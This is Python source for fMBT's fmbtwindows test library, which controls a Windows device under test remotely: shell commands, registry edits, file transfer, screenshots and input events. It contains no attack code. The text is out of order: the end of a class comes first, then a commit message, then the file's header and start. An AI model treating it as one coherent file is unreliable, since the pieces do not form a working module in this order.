maximum number of matches to be returned. The
default is 1. limit=None returns all matching
pairs.
Example:
findRegistry("HKEY_LOCAL_MACHINE", key="\\Windows$")
"""
if key == None and valueName == None:
raise ValueError("either key or valueName must be provided")
return self.existingConnection().evalPython(
'findRegistry(%s, key=%s, valueName=%s, limit=%s)' % (
repr(rootKey), repr(key), repr(valueName), repr(limit)))
def setRegistry(self, key, valueName, value, valueType=None):
"""
Set Windows registry value.
Parameters:
key (string):
full key name.
valueName (string):
name of the value to be set.
value (string):
string that specifies the new value.
valueType (string, optional for str and int values):
REG_BINARY, REG_DWORD, REG_DWORD_LITTLE_ENDIAN,
REG_DWORD_BIG_ENDIAN, REG_EXPAND_SZ, REG_LINK,
REG_MULTI_SZ, REG_NONE, REG_RESOURCE_LIST or REG_SZ.
Default types for storing str and int values
are REG_SZ and REG_DWORD.
Example:
setRegistry(r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet"
"\Control\Session Manager\Environment",
"PATH", r"C:\MyExecutables", "REG_EXPAND_SZ")
Returns True on success.
"""
return self.existingConnection().evalPython(
"setRegistry(%s,%s,%s,%s)" % (repr(key), repr(valueName),
repr(value), repr(valueType)))
def getRegistry(self, key, valueName):
"""
Return Windows registry value and type
Parameters:
key (string):
full key name.
valueName (string):
name of the value to be read.
Returns a pair (value, valueType)
Example:
getRegistry(r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet"
"\Control\Session Manager\Environment", "PATH")
"""
return self.existingConnection().evalPython(
"getRegistry(%s,%s)" % (repr(key), repr(valueName)))
def processList(self):
"""
Return list of processes running on the device.
Returns list of dictionaries with keys:
"pid": process ID, and
"ProcessImageFileName": full path to the executable in win32 format.
"""
return self.existingConnection().evalPython("processList()")
def processStatus(self, pid):
"""
Return status of a process
Parameters:
pid (integer):
Process ID of the process
Returns properties in a dictionary.
Example:
print "Memory usage:", processStatus(4242)["WorkingSetSize"]
"""
return self.existingConnection().evalPython(
"processStatus(%s)" % (repr(pid),))
def productList(self):
"""
Return list of products installed or advertised in the system
Returns list of dictionaries, each containing properties of a product.
"""
return self.existingConnection().evalPython("products()")
def pycosh(self, command):
"""
Run command in pycosh shell on the device.
Parameters:
command (string):
pycosh command to be executed. Pycosh implements
stripped-down versions of zip, tar, find, md5sum, diff,
grep, head, tail, curl,... the usual handy shell utils.
For information on pycosh commands, try
device.pycosh("help") or run in shell:
echo help | python -m pycosh.
"""
return self.existingConnection().pycosh(command)
def setScreenshotSize(self, size):
"""
Force screenshots from device to use given resolution.
Overrides detected monitor resolution on device.
Parameters:
size (pair of integers: (width, height)):
width and height of screenshot.
"""
self._conn.setScreenshotSize(size)
def setTopWindow(self, window):
"""
Set a window as a foreground window and bring it to front.
Parameters:
window (title (string) or hwnd (integer):
title or handle of the window to be raised
foreground.
Returns True if the window was brought to the foreground,
otherwise False.
Notes: calls SetForegroundWindow in user32.dll.
"""
return self.existingConnection().sendSetTopWindow(window)
def setViewSource(self, source, properties=None):
"""
Set default view source for refreshView()
Parameters:
source (string):
default source, "enumchildwindow" or "uiautomation",
"uiautomation/raw", "uiautomation/control",
"uiautomation/content".
properties (string or list of strings, optional):
set list of view item properties to be read.
"all" reads all available properties for each item.
"fast" reads a set of preselected properties.
list of strings reads properties in the list.
The default is "all".
Returns None.
See also refreshView(), viewSource(), refreshViewDefaults().
"""
if not source in _g_viewSources:
raise ValueError(
'invalid view source "%s", expected one of: "%s"' %
(source, '", "'.join(_g_viewSources)))
if properties != None:
self._refreshViewDefaults["properties"] = properties
self._refreshViewDefaults["viewSource"] = source
def shell(self, command):
"""
Execute command in Windows.
Parameters:
command (string or list of strings):
command to be executed. Will be forwarded directly
to subprocess.check_output. If command is a string,
then it will be executed in subshell, otherwise without
shell.
Returns what is printed by the command.
If you wish to receive exitstatus or standard output and error
separated from command, refer to shellSOE().
"""
return self._conn.evalPython('shell(%s)' % (repr(command),))
def shellSOE(self, command, asyncStatus=None, asyncOut=None, asyncError=None, cwd=None):
"""
Execute command on Windows.
Parameters:
command (string or list of strings):
command to be executed. If command is a list of
string, it will be executed without shell
(subprocess.check_output with shell=False).
If command is a single-line string, it will be
executed in shell (subprocess.check_output with
shell=True).
If command is a multiline string, it will be written
to a BAT file and executed as a script.
asyncStatus (string, True or None)
filename (on device) to which the status of
asynchronously executed shellCommand will be
written. If True, the command will be executed
asynchronously but exit status will not be
saved. The default is None, that is, command will be
run synchronously, and status will be returned in
the tuple.
asyncOut (string, True or None)
filename (on device) to which the standard output of
asynchronously executed shellCommand will be
written. If True, the command will be executed
asynchronously but output will not saved. The
default is None.
asyncError (string, True or None)
filename (on device) to which the standard error of
asynchronously executed shellCommand will be
written. If True, the command will be executed
asynchronously but standard error will not be
saved. The default is None.
cwd (string, optional)
current working directory in which the command
will be executed. If not given, the cwd defaults
to the current working directory of the pythonshare
server process on the device, or the cwd of the Python
process if executed on host without pythonshare-server.
Returns triplet: exit status, standard output and standard error
from the command.
If executing command fails, returns None, None, None.
"""
return self._conn.evalPython(
'shellSOE(%s, asyncStatus=%s, asyncOut=%s, asyncError=%s, cwd=%s)'
% (repr(command),
repr(asyncStatus), repr(asyncOut), repr(asyncError),
repr(cwd)))
def showWindow(self, window, showCmd=SW_NORMAL):
"""
Send showCmd to window.
Parameters:
window (window title (string) or handle (integer)):
window to which the command will be sent.
showCmd (integer or string):
command to be sent. Valid commands are 0..11:
SW_HIDE, SW_NORMAL, SW_MINIMIZED, SW_MAXIMIZE,
SW_NOACTIVATE, SW_SHOW SW_MINIMIZE, SW_MINNOACTIVE,
SW_SHOWNA, SW_RESTORE, SW_DEFAULT, SW_FORCEMINIMIZE.
Returns True if the window was previously visible,
otherwise False.
Notes: calls ShowWindow in user32.dll.
"""
return self.existingConnection().sendShowWindow(window, showCmd)
def tapText(self, text, partial=False, **tapKwArgs):
"""
Find an item with given text from the latest view, and tap it.
Parameters:
partial (boolean, optional):
refer to verifyText documentation. The default is
False.
tapPos (pair of floats (x, y)):
refer to tapItem documentation.
button, long, hold, count, delayBetweenTaps (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
items = self.existingView().findItemsByText(text, partial=partial, count=1, onScreen=True)
if len(items) == 0: return False
return self.tapItem(items[0], **tapKwArgs)
def topWindow(self):
"""
Returns a handle to the window.
"""
return self.existingConnection().evalPython(
"ctypes.windll.user32.GetForegroundWindow()")
def topWindowProperties(self):
"""
Return properties of the top window as a dictionary
"""
return self._conn.recvTopWindowProperties()
def verifyText(self, text, partial=False):
"""
Verify that the last view has at least one item with given
text.
Parameters:
text (string):
text to be searched for in items.
partial (boolean, optional):
if True, match items if item text contains given
text, otherwise match only if item text is equal to
the given text. The default is False (exact match).
"""
assert self._lastView != None, "View required."
return self._lastView.findItemsByText(text, partial=partial, count=1, onScreen=True) != []
def viewSource(self):
"""
Returns current default view source.
See also refreshView(), setViewSource().
"""
return self._refreshViewDefaults.get(
"viewSource", self._defaultViewSource)
def windowList(self):
"""
Return list of properties of windows (dictionaries)
Example: list window handles and titles:
for props in d.windowList():
print props["hwnd"], props["title"]
"""
return self._conn.recvWindowList()
def windowProperties(self, window):
"""
Returns properties of a window.
Parameters:
window (title (string) or hwnd (integer):
The window whose properties will be returned.
Returns properties in a dictionary.
"""
return self.existingConnection().recvWindowProperties(window)
def windowStatus(self, window):
"""
Returns status of a window.
Parameters:
window (title (string) or hwnd (integer):
The window whose properties will be returned.
Returns status in a dictionary.
"""
return self.existingConnection().recvWindowStatus(window)
def view(self):
return self._lastView
def viewStats(self):
return self._lastViewStats
class _NoPythonshareConnection(object):
"""Fake Pythonshare connection, evaluate everything locally"""
def __init__(self, namespace="default"):
self._namespaces = {}
self._ns = namespace
def exec_in(self, ns, code):
if not ns in self._namespaces:
self._namespaces[ns] = {}
exec code in self._namespaces[ns]
def eval_in(self, ns, expr):
if not ns in self._namespaces:
self._namespaces[ns] = {}
return eval(expr, self._namespaces[ns])
def namespace(self):
return self._ns
class WindowsConnection(fmbtgti.GUITestConnection):
def __init__(self, connspec, password):
fmbtgti.GUITestConnection.__init__(self)
self._screenshotSize = (None, None) # autodetect
self._pycosh_sent_to_dut = False
if connspec != None:
self._agent = pythonshare.connect(connspec, password=password)
else:
if os.name != "nt":
raise ValueError("connecting to host works only on Windows")
self._agent = _NoPythonshareConnection()
self._agent_ns = self._agent.namespace()
agentFilename = os.path.join(
os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))),
"fmbtwindows_agent.py")
self._agent.exec_in(self._agent_ns, file(agentFilename).read())
self.setScreenToDisplayCoords(lambda x, y: (x, y))
self.setDisplayToScreenCoords(lambda x, y: (x, y))
def pycosh(self, command):
if not self._pycosh_sent_to_dut:
# upload pycosh module to DUT
self.execPython(file(inspect.getsourcefile(pycosh)).read())
self._pycosh_sent_to_dut = True
return self.evalPython("pycosh_eval(%s)" % (repr(command),))
def setScreenshotSize(self, screenshotSize):
self._screenshotSize = screenshotSize
screenW, screenH = self._screenshotSize
inputW, inputH = self._agent.eval_in(self._agent_ns, "_mouse_input_area")
self.setScreenToDisplayCoords(
lambda x, y: (x * inputW / screenW, y * inputH / screenH))
self.setDisplayToScreenCoords(
lambda x, y: (x * screenW / inputW, y * screenH / inputH))
def execPython(self, code):
return self._agent.exec_in(self._agent_ns, code)
def evalPython(self, code):
return self._agent.eval_in(self._agent_ns, code)
def recvFile(self, remoteFilename, localFilename=None, compress=False):
if compress:
if isinstance(compress, int):
compressLevel = compress
else:
compressLevel = 3
data = self._agent.eval_in(
self._agent_ns,
"zlib.compress(file(%s, 'rb').read(), %s)" % (
repr(remoteFilename), compressLevel))
data = zlib.decompress(data)
else:
data = self._agent.eval_in(
self._agent_ns,
"file(%s, 'rb').read()" % (repr(remoteFilename),))
if localFilename:
file(localFilename, "wb").write(data)
return True
else:
return data
def sendFile(self, localFilename, remoteFilepath):
data = file(localFilename).read()
rv = self.evalPython('saveFile(%s, %s, base64.b64decode(%s))' %
(repr(os.path.basename(localFilename)),
repr(remoteFilepath),
repr(base64.b64encode(data))))
return rv
def recvMatchingPaths(self, pathnamePattern):
return self._agent.eval_in(self._agent_ns,
"glob.glob(%s)" % (repr(pathnamePattern),))
def recvScreenshot(self, filename, screenshotSize=(None, None)):
ppmfilename = filename + ".ppm"
if screenshotSize == (None, None):
screenshotSize = self._screenshotSize
width, height, zdata = self._agent.eval_in(
self._agent_ns, "screenshotZYBGR(%s)" % (repr(screenshotSize),))
data = zlib.decompress(zdata)
fmbtgti.eye4graphics.wbgr2rgb(data, width, height)
if fmbtpng != None:
file(filename, "wb").write(
fmbtpng.raw2png(data, width, height, 8, "RGB"))
else:
ppm_header = "P6\n%d %d\n%d\n" % (width, height, 255)
f = file(filename + ".ppm", "wb")
f.write(ppm_header)
f.write(data)
f.close()
_run([fmbt_config.imagemagick_convert, ppmfilename, filename], expectedExitStatus=[0])
os.remove(ppmfilename)
return True
def recvTopWindowProperties(self):
return self.evalPython("topWindowProperties()")
def recvWindowProperties(self, window):
hwnd = self._window2hwnd(window)
return self.evalPython("windowProperties(%s)" % (hwnd,))
def recvWindowStatus(self, window):
hwnd = self._window2hwnd(window)
return self.evalPython("windowStatus(%s)" % (hwnd,))
def recvViewData(self, window=None):
rv = None
if window == None:
rv = self.evalPython("topWindowWidgets()")
elif isinstance(window, int):
rv = self.evalPython("windowWidgets(%s)" % (repr(window),))
elif isinstance(window, str) or isinstance(window, unicode):
wlist = self.evalPython("windowList()")
for w in wlist:
if w["title"] == window:
rv = self.evalPython("windowWidgets(%s)" % (repr(w["hwnd"]),))
break
else:
raise ValueError('no window with title "%s"' % (window,))
else:
raise ValueError('illegal window "%s", expected integer or string (hWnd or title)' % (window,))
return rv
def recvViewUIAutomation(self, window=None, items=[], properties=None, area=None, walker="raw"):
"""returns list of dictionaries, each of which contains properties of
an item"""
if not walker in ["raw", "control", "content"]:
raise ValueError('invalid walker %s' % (repr(walker),))
if window != None:
hwnd = self._window2hwnd(window)
else:
hwnd = None
if properties == None:
properties = []
else:
# make sure certain properties are always included
propertySet = set(properties)
for must_be in ["BoundingRectangle"]:
propertySet.add(must_be)
properties = list(propertySet)
dumps = []
if items:
for item in items:
dumps.append(self.evalPython("dumpUIAutomationElements(%s, %s, %s, %s, %s)" % (
repr(hwnd),
repr([str(item.id()) for item in item.branch()]),
repr(properties),
repr(area),
repr(walker))))
else:
dumps.append(self.evalPython("dumpUIAutomationElements(%s, %s, %s, %s, %s)" % (
repr(hwnd),
repr([]),
repr(properties),
repr(area),
repr(walker))))
rv = []
prop_data = {}
for dump in dumps:
for prop_line in dump.splitlines():
if not "=" in prop_line:
continue
prop_name, prop_value = prop_line.split("=", 1)
if prop_name == "hash":
if prop_data:
rv.append(prop_data)
prop_data = {}
prop_data[prop_name] = prop_value.replace(r"\r\n", "\n").replace(r"\\", "\\")
if prop_data:
rv.append(prop_data)
return rv
def recvWindowList(self):
return self.evalPython("windowList()")
def _window2hwnd(self, window):
if isinstance(window, str) or isinstance(window, unicode):
windowList = self.recvWindowList()
hwndList = [w["hwnd"] for w in windowList if w["title"] == window]
if not hwndList:
raise ValueError('no window with title "%s"' % (window,))
hwnd = hwndList[0]
elif isinstance(window, dict) and "hwnd" in window:
hwnd = window["hwnd"]
elif isinstance(window, int) or isinstance(window, long):
hwnd = window
else:
raise ValueError('invalid window "%s", string, integer or dict with "hwnd" key expected' % (window,))
return hwnd
def sendCloseWindow(self, window):
hwnd = self._window2hwnd(window)
return self.evalPython("closeWindow(%s)" % (repr(hwnd),))
def sendSetForegroundWindow(self, window):
hwnd = self._window2hwnd(window)
return 0 != self.evalPython("ctypes.windll.user32.SetForegroundWindow(%s)" %
(repr(hwnd),))
def sendSetTopWindow(self, window):
hwnd = self._window2hwnd(window)
return 0 != self.evalPython("setTopWindow(%s)" %
(repr(hwnd),))
def sendShowWindow(self, window, showCmd):
hwnd = self._window2hwnd(window)
return self.evalPython("showWindow(%s, %s)" % (repr(hwnd), repr(showCmd)))
def sendType(self, text):
command = 'sendType(%s)' % (repr(text),)
self._agent.eval_in(self._agent_ns, command)
return True
def sendPress(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKey("%s",[])' % (keyCode,)
else:
command = 'sendKey("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendKeyDown(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKeyDown("%s",[])' % (keyCode,)
else:
command = 'sendKeyDown("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendKeyUp(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKeyUp("%s",[])' % (keyCode,)
else:
command = 'sendKeyUp("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendTap(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTap(%s, %s)" % (x, y)
else:
command = "sendClick(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchDown(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchDown(%s, %s)" % (x, y)
else:
command = "(sendMouseMove(%s, %s), sendMouseDown(%s))" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchMove(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchMove(%s, %s)" % (x, y)
else:
command = "sendMouseMove(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchUp(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchUp(%s, %s)" % (x, y)
else:
command = "(sendMouseMove(%s, %s, %s), sendMouseUp(%s))" % (
x, y, button, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendPinch(self, *args):
self.evalPython("touchPinch%s" % (args,))
return True
def setScreenToDisplayCoords(self, screenToDisplayFunction):
self._screenToDisplay = screenToDisplayFunction
def setDisplayToScreenCoords(self, displayToScreenFunction):
self._displayToScreen = displayToScreenFunction
class FMBTWindowsError(Exception): pass
fmbtwindows: added data parameter to Device.putFile
Enables creating a new file from the device under test.
# fMBT, free Model Based Testing tool
# Copyright (c) 2014, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
"""
This is library implements fMBT GUITestInterface for Windows
How to setup Windows device under test
1. Install Python 2.X. (For example 2.7.)
2. Add Python to PATH, so that command "python" starts the interpreter.
3. Copy fMBT's pythonshare directory to Windows.
4. In the pythonshare directory, run "python setup.py install"
5. Run:
cd \\python27\\scripts
python pythonshare-server --interface=all --password=xxxxxxxx
How to connect to the device
import fmbtwindows
d = fmbtwindows.Device("IP-ADDRESS-OF-THE-DEVICE", password="xxxxxxxx")
"""
import ast
import base64
import fmbt
import fmbt_config
import fmbtgti
import inspect
import math
import os
import pythonshare
import shutil
import subprocess
import time
import zlib
try:
import pycosh
except ImportError:
pycosh = None
try:
import fmbtpng
except ImportError:
fmbtpng = None
if os.name == "nt":
_g_closeFds = False
else:
_g_closeFds = True
def _adapterLog(msg):
fmbt.adapterlog("fmbtwindows %s" % (msg,))
def _run(command, expectedExitStatus=None):
"""
Execute command in child process, return status, stdout, stderr.
"""
if type(command) == str:
shell = True
else:
shell = False
try:
p = subprocess.Popen(command, shell=shell,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=_g_closeFds)
if expectedExitStatus != None:
out, err = p.communicate()
else:
out, err = ('', None)
except Exception, e:
class fakeProcess(object): pass
p = fakeProcess
p.returncode = 127
out, err = ('', e)
exitStatus = p.returncode
if (expectedExitStatus != None and
exitStatus != expectedExitStatus and
exitStatus not in expectedExitStatus):
msg = "Executing %s failed. Exit status: %s, expected %s" % (
command, exitStatus, expectedExitStatus)
_adapterLog("%s\n stdout: %s\n stderr: %s\n" % (msg, out, err))
raise FMBTWindowsError(msg)
return exitStatus, out, err
_g_keyNames = [
"VK_LBUTTON", "VK_RBUTTON", "VK_CANCEL", "VK_MBUTTON",
"VK_XBUTTON1", "VK_XBUTTON2", "VK_BACK", "VK_TAB", "VK_CLEAR",
"VK_RETURN", "VK_SHIFT", "VK_CONTROL", "VK_MENU", "VK_PAUSE",
"VK_CAPITAL", "VK_KANA", "VK_HANGUL", "VK_JUNJA", "VK_FINAL",
"VK_HANJA", "VK_KANJI", "VK_ESCAPE", "VK_CONVERT", "VK_NONCONVERT",
"VK_ACCEPT", "VK_MODECHANGE", "VK_SPACE", "VK_PRIOR", "VK_NEXT",
"VK_END", "VK_HOME", "VK_LEFT", "VK_UP", "VK_RIGHT", "VK_DOWN",
"VK_SELECT", "VK_PRINT", "VK_EXECUTE", "VK_SNAPSHOT", "VK_INSERT",
"VK_DELETE", "VK_HELP", "VK_LWIN", "VK_RWIN", "VK_APPS", "VK_SLEEP",
"VK_NUMPAD0", "VK_NUMPAD1", "VK_NUMPAD2", "VK_NUMPAD3", "VK_NUMPAD4",
"VK_NUMPAD5", "VK_NUMPAD6", "VK_NUMPAD7", "VK_NUMPAD8", "VK_NUMPAD9",
"VK_MULTIPLY", "VK_ADD", "VK_SEPARATOR", "VK_SUBTRACT", "VK_DECIMAL",
"VK_DIVIDE", "VK_F1", "VK_F2", "VK_F3", "VK_F4", "VK_F5", "VK_F6",
"VK_F7", "VK_F8", "VK_F9", "VK_F10", "VK_F11", "VK_F12", "VK_F13",
"VK_F14", "VK_F15", "VK_F16", "VK_F17", "VK_F18", "VK_F19", "VK_F20",
"VK_F21", "VK_F22", "VK_F23", "VK_F24", "VK_NUMLOCK", "VK_SCROLL",
"VK_LSHIFT", "VK_RSHIFT", "VK_LCONTROL", "VK_RCONTROL", "VK_LMENU",
"VK_RMENU", "VK_BROWSER_BACK", "VK_BROWSER_FORWARD",
"VK_BROWSER_REFRESH", "VK_BROWSER_STOP", "VK_BROWSER_SEARCH",
"VK_BROWSER_FAVORITES", "VK_BROWSER_HOME", "VK_VOLUME_MUTE",
"VK_VOLUME_DOWN", "VK_VOLUME_UP", "VK_MEDIA_NEXT_TRACK",
"VK_MEDIA_PREV_TRACK", "VK_MEDIA_STOP", "VK_MEDIA_PLAY_PAUSE",
"VK_LAUNCH_MAIL", "VK_LAUNCH_MEDIA_SELECT", "VK_LAUNCH_APP1",
"VK_LAUNCH_APP2", "VK_OEM_1", "VK_OEM_PLUS", "VK_OEM_COMMA",
"VK_OEM_MINUS", "VK_OEM_PERIOD", "VK_OEM_2", "VK_OEM_3", "VK_OEM_4",
"VK_OEM_5", "VK_OEM_6", "VK_OEM_7", "VK_OEM_8", "VK_OEM_102",
"VK_PROCESSKEY", "VK_PACKET", "VK_ATTN", "VK_CRSEL", "VK_EXSEL",
"VK_EREOF", "VK_PLAY", "VK_ZOOM", "VK_PA1", "VK_OEM_CLEAR", "0", "1",
"2", "3", "4", "5", "6", "7", "8", "9", "A", "B", "C", "D", "E", "F",
"G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T",
"U", "V", "W", "X", "Y", "Z"]
_g_viewSources = ["enumchildwindows", "uiautomation",
"uiautomation/raw", "uiautomation/control",
"uiautomation/content"]
# ShowWindow showCmd
SW_HIDE = 0
SW_NORMAL = 1
SW_MINIMIZED = 2
SW_MAXIMIZE = 3
SW_NOACTIVATE = 4
SW_SHOW = 5
SW_MINIMIZE = 6
SW_MINNOACTIVE = 7
SW_SHOWNA = 8
SW_RESTORE = 9
SW_DEFAULT = 10
SW_FORCEMINIMIZE = 11
sortItems = fmbtgti.sortItems
class ViewItem(fmbtgti.GUIItem):
def __init__(self, view, itemId, parentId, className, text, bbox, dumpFilename,
rawProperties=None):
self._view = view
self._itemId = itemId
self._parentId = parentId
self._className = className
self._text = text
if rawProperties:
self._properties = rawProperties
else:
self._properties = {}
fmbtgti.GUIItem.__init__(self, self._className, bbox, dumpFilename)
def branch(self):
"""Returns list of view items from the root down to this item
Note: works only for UIAutomation backend"""
if not self._view._viewSource.startswith("uiautomation"):
raise NotImplementedError(
"branch() works only for uiautomation at the moment")
rv = []
itemId = self._itemId
while itemId:
rv.append(self._view._viewItems[itemId])
if itemId in self._view._viewItems:
itemId = self._view._viewItems[itemId]._parentId
else:
itemId = None
rv.reverse()
return rv
def children(self):
if self._view._viewSource.startswith("enumchildwindows"):
return [self._view._viewItems[winfo[0]]
for winfo in self._view._itemTree[self._itemId]]
else:
items = self._view._viewItems
return [items[itemHash]
for itemHash in items
if items[itemHash]._parentId == self._itemId]
def parent(self):
return self._parentId
def parentItem(self):
try:
return self._view._viewItems[self._parentId]
except KeyError:
return None
def id(self):
return self._itemId
def properties(self):
return self._properties
def text(self):
return self._text
def dumpProperties(self):
rv = []
if self._properties:
for key in sorted(self._properties.keys()):
rv.append("%s=%s" % (key, self._properties[key]))
return "\n".join(rv)
def __str__(self):
return "ViewItem(%s)" % (self._view._dumpItem(self),)
class View(object):
def __init__(self, dumpFilename, itemTree, itemOnScreen=None):
self._dumpFilename = dumpFilename
self._itemTree = itemTree
self._rootItem = None
self._viewItems = {}
if itemOnScreen == None:
self._itemOnScreen = lambda item: True
else:
self._itemOnScreen = itemOnScreen
if isinstance(itemTree, dict):
# data from enumchildwindows:
self._viewSource = "enumchildwindows"
for itemId, winfoList in itemTree.iteritems():
for winfo in winfoList:
itemId, parentId, className, text, bbox = winfo
self._viewItems[itemId] = ViewItem(
self, itemId, parentId, className, text, bbox, dumpFilename)
self._rootItem = self._viewItems[self._itemTree["root"][0][0]]
elif isinstance(itemTree, list):
# data from uiautomation
# list of dictionaries, each of which contains properties of an item
self._viewSource = "uiautomation"
for elt in itemTree:
bboxString = elt.get("BoundingRectangle", "0;0;0;0")
if ";" in bboxString:
bboxSeparator = ";"
else:
bboxSeparator = ","
try:
bbox = [int(coord) for coord in bboxString.split(bboxSeparator)]
bbox[2] = bbox[0] + bbox[2] # width to right
bbox[3] = bbox[1] + bbox[3] # height to bottom
bbox = tuple(bbox)
except Exception, e:
bbox = (0, 0, 0, 0)
text = elt.get("Value", "")
if text == "":
text = elt.get("Name", "")
vi = ViewItem(
self, int(elt["hash"]), int(elt["parent"]),
elt.get("ClassName", ""),
text,
bbox,
dumpFilename,
elt)
self._viewItems[int(elt["hash"])] = vi
if vi.parent() == 0:
self._rootItem = vi
if not self._rootItem:
raise ValueError("no root item in view data")
def _intCoords(self, *args):
# TODO: relative coordinates like (0.5, 0.9)
return [int(c) for c in args[0]]
def filename(self):
return self._dumpFilename
def rootItem(self):
return self._rootItem
def _dumpItem(self, viewItem):
return "id=%s cls=%s text=%s bbox=%s" % (
viewItem._itemId, repr(viewItem._className), repr(viewItem._text),
viewItem._bbox)
def _dumpTree(self, rootItem, depth=0):
l = ["%s%s" % (" " * (depth * 4), self._dumpItem(rootItem))]
for child in rootItem.children():
l.extend(self._dumpTree(child, depth+1))
return l
def dumpTree(self, rootItem=None):
"""
Returns item tree as a string
"""
if rootItem == None:
rootItem = self.rootItem()
return "\n".join(self._dumpTree(rootItem))
def __str__(self):
return "View(%s, %s items)" % (repr(self._dumpFilename), len(self._viewItems))
def findItems(self, comparator, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
foundItems = []
if count == 0: return foundItems
if searchRootItem != None:
if comparator(searchRootItem) and (
not onScreen or (self._itemOnScreen(searchRootItem))):
foundItems.append(searchRootItem)
for c in searchRootItem.children():
foundItems.extend(self.findItems(comparator, count=count-len(foundItems), searchRootItem=c, onScreen=onScreen))
else:
if searchItems:
domain = iter(searchItems)
else:
domain = self._viewItems.itervalues
for i in domain():
if comparator(i) and (not onScreen or (self._itemOnScreen(i))):
foundItems.append(i)
if count > 0 and len(foundItems) >= count:
break
return foundItems
def findItemsByText(self, text, partial=False, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
if partial:
c = lambda item: (text in item._text)
else:
c = lambda item: (text == item._text)
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
def findItemsByClass(self, className, partial=False, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
if partial:
c = lambda item: (className in item._className)
else:
c = lambda item: (className == item._className)
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
def findItemsById(self, itemId, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
c = lambda item: (itemId == item._itemId or itemId == item.properties().get("AutomationId", None))
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
def findItemsByProperties(self, properties, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
"""
Returns ViewItems where every property matches given properties
Parameters:
properties (dictionary):
names and required values of properties
Example:
view.findItemsByProperties({"Value": "HELLO", "Name": "File name:"})
See also:
viewitem.dumpProperties()
Notes:
- requires uiautomation (refreshView(viewSource="uiautomation"))
- all names and values are strings
"""
c = lambda item: 0 == len([key for key in properties
if properties[key] != item.properties().get(key, None)])
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
def findItemsByPos(self, pos, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
"""
Returns list of ViewItems whose bounding box contains the position.
Parameters:
pos (pair of floats (0.0..0.1) or integers (x, y)):
coordinates that fall in the bounding box of found items.
other parameters: refer to findItems documentation.
Items are listed in ascending order based on area. They may
or may not be from the same branch in the widget hierarchy.
"""
x, y = self._intCoords(pos)
c = lambda item: (item.bbox()[0] <= x <= item.bbox()[2] and item.bbox()[1] <= y <= item.bbox()[3])
items = self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
# sort from smallest to greatest area
area_items = [((i.bbox()[2] - i.bbox()[0]) * (i.bbox()[3] - i.bbox()[1]), i) for i in items]
return [i for _, i in sorted(area_items)]
def items(self):
"""
Returns list of all items in the view
"""
return fmbtgti.sortItems(self._viewItems.values(), "topleft")
def save(self, fileOrDirName):
"""
Save view dump to a file.
"""
shutil.copy(self._dumpFilename, fileOrDirName)
class Device(fmbtgti.GUITestInterface):
def __init__(self, connspec=None, password=None, screenshotSize=(None, None),
connect=True, **kwargs):
"""Connect to windows device under test.
Parameters:
connspec (string or None, optional):
specification for connecting to a pythonshare
server that will run fmbtwindows-agent. The format is
"[socket://][password@]<host>[:<port>][/namespace]".
The default is None: run the agent on host, do not
connect to a pythonshare server (works only on Windows).
password (string or None, optional):
authenticate to pythonshare server with given
password. The default is None (no authentication).
rotateScreenshot (integer, optional)
rotate new screenshots by rotateScreenshot degrees.
Example: rotateScreenshot=-90. The default is 0 (no
rotation).
connect (boolean, optional):
Immediately establish connection to the device. The
default is True.
To prepare a windows device for connection, launch there
python pythonshare-server --password mysecretpwd
When not on trusted network, consider ssh port forward, for
instance.
"""
fmbtgti.GUITestInterface.__init__(self, **kwargs)
self._defaultViewSource = _g_viewSources[1]
self._refreshViewDefaults = kwargs
self._lastView = None
self._lastViewStats = {}
self._refreshViewRetryLimit = 1
self._connspec = connspec
self._password = password
if connect:
self.setConnection(WindowsConnection(
self._connspec, self._password))
else:
self.setConnection(None)
def closeWindow(self, window):
"""
Send WM_CLOSE to window
Parameters:
window (window title (string) or handle (integer)):
window to which the command will be sent.
Returns True on success, otherwise False.
"""
return self.existingConnection().sendCloseWindow(window)
def errorReporting(self):
